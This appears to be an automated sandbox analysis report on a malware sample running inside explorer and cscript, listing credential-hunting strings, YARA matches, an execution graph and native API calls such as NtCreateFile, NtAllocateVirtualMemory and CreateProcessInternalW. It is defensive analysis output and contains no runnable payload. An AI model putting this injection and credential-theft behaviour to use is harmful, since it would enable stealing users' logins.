                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E21C070A14B0D8BCB05CF9A98806DEB7E1EF88344F01461DE40ADB344D7B0E9148BC6
                                                                                                                                                                                                        Function 11681FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: auth$logi$pass$user
                                                                                                                                                                                                        • API String ID: 0-2393853802
                                                                                                                                                                                                        • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                                        • Instruction ID: 4402756704d9e6dead8c72b77e41126b83060b70d29a0aefd287dc478976df94
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1821C070614B0D8BCB05CF9998906DEBBE2EF88344F004619E40AEB244D7B5E955CBCA

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:1.8%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:2%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:602
                                                                                                                                                                                                        Total number of Limit Nodes:77
                                                                                                                                                                                                        execution_graph 91270 3019080 91271 30190a4 91270->91271 91276 30190bb 91271->91276 91281 301bd40 91271->91281 91272 3019113 91273 3019120 Sleep 91272->91273 91278 301919c 91272->91278 91293 3018ca0 LdrLoadDll 91272->91293 91294 3018eb0 LdrLoadDll 91272->91294 91273->91272 91276->91272 91276->91278 91284 300acf0 91276->91284 91288 3014e50 91276->91288 91295 301a540 91281->91295 91283 301bd6d 91283->91276 91285 300ad14 91284->91285 91286 300ad50 LdrLoadDll 91285->91286 91287 300ad1b 91285->91287 91286->91287 91287->91276 91289 3014e5e 91288->91289 91291 3014e6a 91288->91291 91289->91291 91302 30152d0 LdrLoadDll 91289->91302 91291->91276 91292 3014fbc 91292->91276 91293->91272 91294->91272 91296 301a55c NtAllocateVirtualMemory 91295->91296 91298 301af60 91295->91298 91296->91283 91299 301af70 91298->91299 91301 301af92 91298->91301 91300 3014e50 LdrLoadDll 91299->91300 91300->91301 91301->91296 91302->91292 91303 301f13d 91306 301b9d0 91303->91306 91307 301b9f6 91306->91307 91308 301ba02 91307->91308 91314 3009d40 91307->91314 91310 301ba26 91308->91310 91322 3008f30 91308->91322 91360 301a6b0 91310->91360 91363 3009c90 91314->91363 91316 3009d4d 91317 3009d54 91316->91317 91375 3009c30 91316->91375 91317->91308 91323 3008f57 91322->91323 91773 300b1c0 91323->91773 91325 3008f69 91777 300af10 91325->91777 91327 3008f86 91334 3008f8d 91327->91334 91848 300ae40 LdrLoadDll 91327->91848 91329 30090f2 91329->91310 91331 3008ffc 91793 300f410 91331->91793 91333 3009006 91333->91329 91335 301bf90 2 API calls 91333->91335 91334->91329 91781 300f380 91334->91781 91336 300902a 91335->91336 91337 301bf90 2 API calls 91336->91337 91338 300903b 91337->91338 91339 301bf90 2 API calls 91338->91339 91340 300904c 91339->91340 91805 300ca90 91340->91805 91342 3009059 91343 3014a50 8 API calls 91342->91343 91344 3009066 91343->91344 91345 3014a50 8 API calls 91344->91345 91346 3009077 91345->91346 91347 3009084 91346->91347 91348 30090a5 91346->91348 91815 300d620 91347->91815 91349 3014a50 8 API calls 91348->91349 91357 30090c1 91349->91357 91352 30090e9 91355 3008d00 23 API calls 91352->91355 91354 3009092 91831 3008d00 91354->91831 91355->91329 91357->91352 91849 300d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 91357->91849 91361 301a6cf 91360->91361 91362 301af60 LdrLoadDll 91360->91362 91362->91361 91394 3018bc0 91363->91394 91367 3009cb6 91367->91316 91368 3009cac 91368->91367 91401 301b2b0 91368->91401 91370 3009cf3 91370->91367 91372 3009d13 91370->91372 91412 3009ab0 91370->91412 91418 3009620 LdrLoadDll 91372->91418 91374 3009d25 91374->91316 91752 301b5a0 91375->91752 91378 301b5a0 LdrLoadDll 91379 3009c5b 91378->91379 91380 3009c71 91379->91380 91381 301b5a0 LdrLoadDll 91379->91381 91382 300f180 91380->91382 91381->91380 91383 300f199 91382->91383 91756 300b040 91383->91756 91385 300f1ac 91760 301a1e0 91385->91760 91389 300f1d2 91392 300f1fd 91389->91392 91766 301a260 91389->91766 91391 301a490 2 API calls 91393 3009d65 91391->91393 91392->91391 91393->91308 91395 3018bcf 91394->91395 91396 3014e50 LdrLoadDll 91395->91396 91397 3009ca3 91396->91397 91398 3018a70 91397->91398 91419 301a600 91398->91419 91402 301b2c9 91401->91402 91422 3014a50 91402->91422 91404 301b2e1 91405 301b2ea 91404->91405 91461 301b0f0 91404->91461 91405->91370 91407 301b2fe 91407->91405 91479 3019f00 91407->91479 91409 301b332 91409->91409 91484 301bdc0 91409->91484 91415 3009aca 91412->91415 91730 3007ea0 91412->91730 91414 3009ad1 91414->91372 91415->91414 91743 3008160 91415->91743 91418->91374 91420 301af60 LdrLoadDll 91419->91420 91421 3018a85 91420->91421 91421->91368 91423 3014d85 91422->91423 91424 3014a64 91422->91424 91423->91404 91424->91423 91487 3019c50 91424->91487 91427 3014b90 91490 301a360 91427->91490 91428 3014b73 91547 301a460 LdrLoadDll 91428->91547 91431 3014b7d 91431->91404 91432 3014bb7 91433 301bdc0 2 API calls 91432->91433 91435 3014bc3 91433->91435 91434 3014d49 91437 301a490 2 API calls 91434->91437 91435->91431 91435->91434 91436 3014d5f 91435->91436 91442 3014c52 91435->91442 91556 3014790 LdrLoadDll NtReadFile NtClose 91436->91556 91438 3014d50 91437->91438 91438->91404 91440 3014d72 91440->91404 91441 3014cb9 91441->91434 91443 3014ccc 91441->91443 91442->91441 91444 3014c61 91442->91444 91549 301a2e0 91443->91549 91446 3014c66 91444->91446 91447 3014c7a 91444->91447 91548 3014650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 91446->91548 91448 3014c97 91447->91448 91449 3014c7f 91447->91449 91448->91438 91505 3014410 91448->91505 91493 30146f0 91449->91493 91452 3014c70 91452->91404 91455 3014c8d 91455->91404 91457 3014d2c 91553 301a490 91457->91553 91459 3014caf 91459->91404 91460 3014d38 91460->91404 91463 301b101 91461->91463 91462 301b113 91462->91407 91463->91462 91464 301bd40 2 API calls 91463->91464 91465 301b134 91464->91465 91574 3014070 91465->91574 91467 301b180 91467->91407 91468 301b157 91468->91467 91469 3014070 3 API calls 91468->91469 91471 301b179 91469->91471 91471->91467 91606 3015390 91471->91606 91472 301b20a 91473 301b21a 91472->91473 91700 301af00 LdrLoadDll 91472->91700 91616 301ad70 91473->91616 91476 301b248 91695 3019ec0 91476->91695 91478 301b272 91478->91407 91478->91478 91480 301af60 LdrLoadDll 91479->91480 91481 3019f1c 91480->91481 91723 51f2b2a 91481->91723 91482 3019f37 91482->91409 91485 301b359 91484->91485 91726 301a670 91484->91726 91485->91370 91488 301af60 LdrLoadDll 91487->91488 91489 3014b44 91488->91489 91489->91427 91489->91428 91489->91431 91491 301af60 LdrLoadDll 91490->91491 91492 301a37c NtCreateFile 91491->91492 91492->91432 91494 301470c 91493->91494 91495 301a2e0 LdrLoadDll 91494->91495 91496 301472d 91495->91496 91497 3014734 91496->91497 91498 3014748 91496->91498 91499 301a490 2 API calls 91497->91499 91500 301a490 2 API calls 91498->91500 91502 301473d 91499->91502 91501 3014751 91500->91501 91557 301bfd0 LdrLoadDll RtlAllocateHeap 91501->91557 91502->91455 91504 301475c 91504->91455 91506 301445b 91505->91506 91507 301448e 91505->91507 91508 301a2e0 LdrLoadDll 91506->91508 91509 30145d9 91507->91509 91513 30144aa 91507->91513 91510 3014476 91508->91510 91511 301a2e0 LdrLoadDll 91509->91511 91512 301a490 2 API calls 91510->91512 91521 30145f4 91511->91521 91514 301447f 91512->91514 91515 301a2e0 LdrLoadDll 91513->91515 91514->91459 91516 30144c5 91515->91516 91517 30144e1 91516->91517 91518 30144cc 91516->91518 91520 30144e6 91517->91520 91529 30144fc 91517->91529 91519 301a490 2 API calls 91518->91519 91524 30144d5 91519->91524 91525 301a490 2 API calls 91520->91525 91570 301a320 LdrLoadDll 91521->91570 91523 301462e 91526 301a490 2 API calls 91523->91526 91524->91459 91527 30144ef 91525->91527 91530 3014639 91526->91530 91527->91459 91528 3014501 91534 3014513 91528->91534 91561 301a410 91528->91561 91529->91528 91558 301bf90 91529->91558 91530->91459 91533 3014567 91535 301457e 91533->91535 91569 301a2a0 LdrLoadDll 91533->91569 91534->91459 91537 3014585 91535->91537 91538 301459a 91535->91538 91539 301a490 2 API calls 91537->91539 91540 301a490 2 API calls 91538->91540 91539->91534 91541 30145a3 91540->91541 91542 30145cf 91541->91542 91564 301bb90 91541->91564 91542->91459 91544 30145ba 91545 301bdc0 2 API calls 91544->91545 91546 30145c3 91545->91546 91546->91459 91547->91431 91548->91452 91550 301af60 LdrLoadDll 91549->91550 91551 3014d14 91550->91551 91552 301a320 LdrLoadDll 91551->91552 91552->91457 91554 301a4ac NtClose 91553->91554 91555 301af60 LdrLoadDll 91553->91555 91554->91460 91555->91554 91556->91440 91557->91504 91571 301a630 91558->91571 91560 301bfa8 91560->91528 91562 301af60 LdrLoadDll 91561->91562 91563 301a42c NtReadFile 91562->91563 91563->91533 91565 301bbb4 91564->91565 91566 301bb9d 91564->91566 91565->91544 91566->91565 91567 301bf90 2 API calls 91566->91567 91568 301bbcb 91567->91568 91568->91544 91569->91535 91570->91523 91572 301af60 LdrLoadDll 91571->91572 91573 301a64c RtlAllocateHeap 91572->91573 91573->91560 91575 3014081 91574->91575 91576 3014089 91574->91576 91575->91468 91605 301435c 91576->91605 91701 301cf30 91576->91701 91578 30140dd 91579 301cf30 2 API calls 91578->91579 91582 30140e8 91579->91582 91580 3014136 91583 301cf30 2 API calls 91580->91583 91582->91580 91709 301cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 91582->91709 91710 301d060 91582->91710 91586 301414a 91583->91586 91585 30141a7 91587 301cf30 2 API calls 91585->91587 91586->91585 91589 301d060 3 API calls 91586->91589 91588 30141bd 91587->91588 91590 30141fa 91588->91590 91592 301d060 3 API calls 91588->91592 91589->91586 91591 301cf30 2 API calls 91590->91591 91593 3014205 91591->91593 91592->91588 91594 301d060 3 API calls 91593->91594 91599 301423f 91593->91599 91594->91593 91597 301cf90 2 API calls 91598 301433e 91597->91598 91600 301cf90 2 API calls 91598->91600 91706 301cf90 91599->91706 91601 3014348 91600->91601 91602 301cf90 2 API calls 91601->91602 91603 3014352 91602->91603 91604 301cf90 2 API calls 91603->91604 91604->91605 91605->91468 91607 30153a1 91606->91607 91608 3014a50 8 API calls 91607->91608 91610 30153b7 91608->91610 91609 301540a 91609->91472 91610->91609 91611 30153f2 91610->91611 91612 3015405 91610->91612 91613 301bdc0 2 API calls 91611->91613 91614 301bdc0 2 API calls 91612->91614 91615 30153f7 91613->91615 91614->91609 91615->91472 91716 301ac30 91616->91716 91618 301ad84 91619 301ac30 LdrLoadDll 91618->91619 91620 301ad8d 91619->91620 91621 301ac30 LdrLoadDll 91620->91621 91622 301ad96 91621->91622 91623 301ac30 LdrLoadDll 91622->91623 91624 301ad9f 91623->91624 91625 301ac30 LdrLoadDll 91624->91625 91626 301ada8 91625->91626 91627 301ac30 LdrLoadDll 91626->91627 91628 301adb1 91627->91628 91629 301ac30 LdrLoadDll 91628->91629 91630 301adbd 91629->91630 91631 301ac30 LdrLoadDll 91630->91631 91632 301adc6 91631->91632 91633 301ac30 LdrLoadDll 91632->91633 91634 301adcf 91633->91634 91635 301ac30 LdrLoadDll 91634->91635 91636 301add8 91635->91636 91637 301ac30 LdrLoadDll 91636->91637 91638 301ade1 91637->91638 91639 301ac30 LdrLoadDll 91638->91639 91640 301adea 91639->91640 91641 301ac30 LdrLoadDll 91640->91641 91642 301adf6 91641->91642 91643 301ac30 LdrLoadDll 91642->91643 91644 301adff 91643->91644 91645 301ac30 LdrLoadDll 91644->91645 91646 301ae08 91645->91646 91647 301ac30 LdrLoadDll 91646->91647 91648 301ae11 91647->91648 91649 301ac30 LdrLoadDll 91648->91649 91650 301ae1a 91649->91650 91651 301ac30 LdrLoadDll 91650->91651 91652 301ae23 91651->91652 91653 301ac30 LdrLoadDll 91652->91653 91654 301ae2f 91653->91654 91655 301ac30 LdrLoadDll 91654->91655 91656 301ae38 91655->91656 91657 301ac30 LdrLoadDll 91656->91657 91658 301ae41 91657->91658 91659 301ac30 LdrLoadDll 91658->91659 91660 301ae4a 91659->91660 91661 301ac30 LdrLoadDll 91660->91661 91662 301ae53 91661->91662 91663 301ac30 LdrLoadDll 91662->91663 91664 301ae5c 91663->91664 91665 301ac30 LdrLoadDll 91664->91665 91666 301ae68 91665->91666 91667 301ac30 LdrLoadDll 91666->91667 91668 301ae71 91667->91668 91669 301ac30 LdrLoadDll 91668->91669 91670 301ae7a 91669->91670 91671 301ac30 LdrLoadDll 91670->91671 91672 301ae83 91671->91672 91673 301ac30 LdrLoadDll 91672->91673 91674 301ae8c 91673->91674 91675 301ac30 LdrLoadDll 91674->91675 91676 301ae95 91675->91676 91677 301ac30 LdrLoadDll 91676->91677 91678 301aea1 91677->91678 91679 301ac30 LdrLoadDll 91678->91679 91680 301aeaa 91679->91680 91681 301ac30 LdrLoadDll 91680->91681 91682 301aeb3 91681->91682 91683 301ac30 LdrLoadDll 91682->91683 91684 301aebc 91683->91684 91685 301ac30 LdrLoadDll 91684->91685 91686 301aec5 91685->91686 91687 301ac30 LdrLoadDll 91686->91687 91688 301aece 91687->91688 91689 301ac30 LdrLoadDll 91688->91689 91690 301aeda 91689->91690 91691 301ac30 LdrLoadDll 91690->91691 91692 301aee3 91691->91692 91693 301ac30 LdrLoadDll 91692->91693 91694 301aeec 91693->91694 91694->91476 91696 301af60 LdrLoadDll 91695->91696 91697 3019edc 91696->91697 91722 51f2d10 LdrInitializeThunk 91697->91722 91698 3019ef3 91698->91478 91700->91473 91702 301cf40 91701->91702 91703 301cf46 91701->91703 91702->91578 91704 301bf90 2 API calls 91703->91704 91705 301cf6c 91704->91705 91705->91578 91707 3014334 91706->91707 91708 301bdc0 2 API calls 91706->91708 91707->91597 91708->91707 91709->91582 91711 301cfd0 91710->91711 91712 301d02d 91711->91712 91713 301bf90 2 API calls 91711->91713 91712->91582 91714 301d00a 91713->91714 91715 301bdc0 2 API calls 91714->91715 91715->91712 91717 301ac4b 91716->91717 91718 3014e50 LdrLoadDll 91717->91718 91719 301ac6b 91717->91719 91718->91719 91720 3014e50 LdrLoadDll 91719->91720 91721 301ad17 91719->91721 91720->91721 91721->91618 91721->91721 91722->91698 91724 51f2b3f LdrInitializeThunk 91723->91724 91725 51f2b31 91723->91725 91724->91482 91725->91482 91727 301a679 91726->91727 91728 301af60 LdrLoadDll 91727->91728 91729 301a68c RtlFreeHeap 91728->91729 91729->91485 91731 3007eb0 91730->91731 91732 3007eab 91730->91732 91733 301bd40 2 API calls 91731->91733 91732->91415 91736 3007ed5 91733->91736 91734 3007f38 91734->91415 91735 3019ec0 2 API calls 91735->91736 91736->91734 91736->91735 91737 3007f3e 91736->91737 91742 301bd40 2 API calls 91736->91742 91746 301a5c0 91736->91746 91738 3007f64 91737->91738 91740 301a5c0 2 API calls 91737->91740 91738->91415 91741 3007f55 91740->91741 91741->91415 91742->91736 91744 301a5c0 2 API calls 91743->91744 91745 300817e 91744->91745 91745->91372 91747 301af60 LdrLoadDll 91746->91747 91748 301a5dc 91747->91748 91751 51f2b90 LdrInitializeThunk 91748->91751 91749 301a5f3 91749->91736 91751->91749 91753 301b5c3 91752->91753 91754 300acf0 LdrLoadDll 91753->91754 91755 3009c4a 91754->91755 91755->91378 91757 300b063 91756->91757 91759 300b0e0 91757->91759 91771 3019c90 LdrLoadDll 91757->91771 91759->91385 91761 301af60 LdrLoadDll 91760->91761 91762 300f1bb 91761->91762 91762->91393 91763 301a7d0 91762->91763 91764 301af60 LdrLoadDll 91763->91764 91765 301a7ef LookupPrivilegeValueW 91764->91765 91765->91389 91767 301af60 LdrLoadDll 91766->91767 91768 301a27c 91767->91768 91772 51f2dc0 LdrInitializeThunk 91768->91772 91769 301a29b 91769->91392 91771->91759 91772->91769 91774 300b1f0 91773->91774 91775 300b040 LdrLoadDll 91774->91775 91776 300b204 91775->91776 91776->91325 91778 300af34 91777->91778 91850 3019c90 LdrLoadDll 91778->91850 91780 300af6e 91780->91327 91782 300f3ac 91781->91782 91783 300b1c0 LdrLoadDll 91782->91783 91784 300f3be 91783->91784 91851 300f290 91784->91851 91787 300f3e4 91787->91331 91788 300f3d9 91788->91787 91789 301a490 2 API calls 91788->91789 91789->91787 91790 300f3f1 91791 301a490 2 API calls 91790->91791 91792 300f402 91790->91792 91791->91792 91792->91331 91794 300f43c 91793->91794 91871 300b2b0 91794->91871 91796 300f44e 91797 300f290 3 API calls 91796->91797 91798 300f45f 91797->91798 91799 300f469 91798->91799 91802 300f481 91798->91802 91800 300f474 91799->91800 91803 301a490 2 API calls 91799->91803 91800->91333 91801 300f492 91801->91333 91802->91801 91804 301a490 2 API calls 91802->91804 91803->91800 91804->91801 91806 300caa6 91805->91806 91807 300cab0 91805->91807 91806->91342 91808 300af10 LdrLoadDll 91807->91808 91809 300cb4e 91808->91809 91810 300cb74 91809->91810 91811 300b040 LdrLoadDll 91809->91811 91810->91342 91812 300cb90 91811->91812 91813 3014a50 8 API calls 91812->91813 91814 300cbe5 91813->91814 91814->91342 91816 300d646 91815->91816 91817 300b040 LdrLoadDll 91816->91817 91818 300d65a 91817->91818 91875 300d310 91818->91875 91820 300908b 91821 300cc00 91820->91821 91822 300cc26 91821->91822 91823 300b040 LdrLoadDll 91822->91823 91824 300cca9 91822->91824 91823->91824 91825 300b040 LdrLoadDll 91824->91825 91826 300cd16 91825->91826 91827 300af10 LdrLoadDll 91826->91827 91828 300cd7f 91827->91828 91829 300b040 LdrLoadDll 91828->91829 91830 300ce2f 91829->91830 91830->91354 91904 300f6d0 91831->91904 91833 3008f25 91833->91310 91834 3008d14 91834->91833 91915 30143a0 91834->91915 91836 3008d70 91836->91833 91918 3008ab0 91836->91918 91839 301cf30 2 API calls 91840 3008db2 91839->91840 91841 301d060 3 API calls 91840->91841 91845 3008dc7 91841->91845 91842 3007ea0 4 API calls 91842->91845 91845->91833 91845->91842 91846 300c7b0 18 API calls 91845->91846 91847 3008160 2 API calls 91845->91847 91923 300f670 91845->91923 91927 300f080 21 API calls 91845->91927 91846->91845 91847->91845 91848->91334 91849->91352 91850->91780 91852 300f2aa 91851->91852 91860 300f360 91851->91860 91853 300b040 LdrLoadDll 91852->91853 91854 300f2cc 91853->91854 91861 3019f40 91854->91861 91856 300f30e 91865 3019f80 91856->91865 91859 301a490 2 API calls 91859->91860 91860->91788 91860->91790 91862 3019f43 91861->91862 91863 301af60 LdrLoadDll 91862->91863 91864 3019f5c 91863->91864 91864->91856 91866 3019f9c 91865->91866 91867 301af60 LdrLoadDll 91865->91867 91870 51f34e0 LdrInitializeThunk 91866->91870 91867->91866 91868 300f354 91868->91859 91870->91868 91872 300b2d7 91871->91872 91873 300b040 LdrLoadDll 91872->91873 91874 300b313 91873->91874 91874->91796 91876 300d327 91875->91876 91884 300f710 91876->91884 91880 300d39b 91881 300d3a2 91880->91881 91895 301a2a0 LdrLoadDll 91880->91895 91881->91820 91883 300d3b5 91883->91820 91885 300f735 91884->91885 91896 30081a0 91885->91896 91887 300d36f 91892 301a6e0 91887->91892 91888 3014a50 8 API calls 91890 300f759 91888->91890 91890->91887 91890->91888 91891 301bdc0 2 API calls 91890->91891 91903 300f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 91890->91903 91891->91890 91893 301af60 LdrLoadDll 91892->91893 91894 301a6ff CreateProcessInternalW 91893->91894 91894->91880 91895->91883 91897 300829f 91896->91897 91898 30081b5 91896->91898 91897->91890 91898->91897 91899 3014a50 8 API calls 91898->91899 91900 3008222 91899->91900 91901 301bdc0 2 API calls 91900->91901 91902 3008249 91900->91902 91901->91902 91902->91890 91903->91890 91905 300f6ef 91904->91905 91906 3014e50 LdrLoadDll 91904->91906 91907 300f6f6 SetErrorMode 91905->91907 91908 300f6fd 91905->91908 91906->91905 91907->91908 91908->91834 91909 30081a0 8 API calls 91908->91909 91913 300f759 91909->91913 91910 300f766 91910->91834 91911 3014a50 8 API calls 91911->91913 91913->91910 91913->91911 91914 301bdc0 2 API calls 91913->91914 91928 300f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 91913->91928 91914->91913 91929 300f4a0 91915->91929 91917 30143c6 91917->91836 91919 301bd40 2 API calls 91918->91919 91922 3008ad5 91918->91922 91919->91922 91920 3008cea 91920->91839 91922->91920 91948 3019880 91922->91948 91924 300f683 91923->91924 91996 3019e90 91924->91996 91927->91845 91928->91913 91930 300f4bd 91929->91930 91936 3019fc0 91930->91936 91933 300f505 91933->91917 91937 301af60 LdrLoadDll 91936->91937 91938 3019fdc 91937->91938 91946 51f2e50 LdrInitializeThunk 91938->91946 91939 300f4fe 91939->91933 91941 301a010 91939->91941 91942 301a02c 91941->91942 91943 301af60 LdrLoadDll 91941->91943 91947 51f2c30 LdrInitializeThunk 91942->91947 91943->91942 91944 300f52e 91944->91917 91946->91939 91947->91944 91949 301bf90 2 API calls 91948->91949 91950 3019897 91949->91950 91969 3009310 91950->91969 91952 30198b2 91953 30198f0 91952->91953 91954 30198d9 91952->91954 91956 301bd40 2 API calls 91953->91956 91955 301bdc0 2 API calls 91954->91955 91957 30198e6 91955->91957 91958 301992a 91956->91958 91957->91920 91959 301bd40 2 API calls 91958->91959 91960 3019943 91959->91960 91966 3019be4 91960->91966 91975 301bd80 LdrLoadDll 91960->91975 91962 3019bc9 91963 3019bd0 91962->91963 91962->91966 91964 301bdc0 2 API calls 91963->91964 91965 3019bda 91964->91965 91965->91920 91967 301bdc0 2 API calls 91966->91967 91968 3019c39 91967->91968 91968->91920 91970 3009335 91969->91970 91971 300acf0 LdrLoadDll 91970->91971 91972 3009368 91971->91972 91974 300938d 91972->91974 91976 300cf20 91972->91976 91974->91952 91975->91962 91977 300cf4c 91976->91977 91978 301a1e0 LdrLoadDll 91977->91978 91979 300cf65 91978->91979 91980 300cf6c 91979->91980 91987 301a220 91979->91987 91980->91974 91984 300cfa7 91985 301a490 2 API calls 91984->91985 91986 300cfca 91985->91986 91986->91974 91988 301af60 LdrLoadDll 91987->91988 91989 301a23c 91988->91989 91995 51f2bc0 LdrInitializeThunk 91989->91995 91990 300cf8f 91990->91980 91992 301a810 91990->91992 91993 301af60 LdrLoadDll 91992->91993 91994 301a82f 91992->91994 91993->91994 91994->91984 91995->91990 91997 3019eac 91996->91997 91998 301af60 LdrLoadDll 91996->91998 92001 51f2cf0 LdrInitializeThunk 91997->92001 91998->91997 91999 300f6ae 91999->91845 92001->91999 92005 51f29f0 LdrInitializeThunk

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 0301A360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 320 301a360-301a3b1 call 301af60 NtCreateFile
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,03014BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03014BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0301A3AD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID: .z`
                                                                                                                                                                                                        • API String ID: 823142352-1441809116
                                                                                                                                                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                                        • Instruction ID: 325361e6e155c984b75c79b4848f7fd10772c6424632a968ee23dd13866ae118
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CF0BDB2201208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E8118BA4
                                                                                                                                                                                                        Function 0301A410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtReadFile.NTDLL(03014D72,5EB65239,FFFFFFFF,03014A31,?,?,03014D72,?,03014A31,FFFFFFFF,5EB65239,03014D72,?,00000000), ref: 0301A455
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                                        • Instruction ID: 1f1c75b823f40b0971178c6cb79b5fd7e1a53f9f8edfef9c7ad51466d6da49fc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFF0A4B6200208ABCB14DF89DC80EEB77ADEF8C754F158248BA1D97241D630E8118BA0
                                                                                                                                                                                                        Function 0301A53A Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03002D11,00002000,00003000,00000004), ref: 0301A579
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                                                                        • Opcode ID: f2ca0bd7ba1458da90e15b92c60de02830a22107da88ad82c7e4025ef20db92f
                                                                                                                                                                                                        • Instruction ID: ba05b1ecbffb979f61707d931a557380dbd4d61f55dd5b44cbecdd11b0a8174d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2ca0bd7ba1458da90e15b92c60de02830a22107da88ad82c7e4025ef20db92f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40F01CB5214149ABCB15DF98D884CE777A9FF88224B15868DF9489B213C234D815CBA1
                                                                                                                                                                                                        Function 0301A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03002D11,00002000,00003000,00000004), ref: 0301A579
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                                        • Instruction ID: 208e4129196cbc44d51e3c9b65091fae6363395ed5a3935ca61cf9b23e6dc821
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DEF015B6200208ABCB14DF89CC80EEB77ADEF88654F118148FE0897241C630F810CBA0
                                                                                                                                                                                                        Function 0301A48A Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
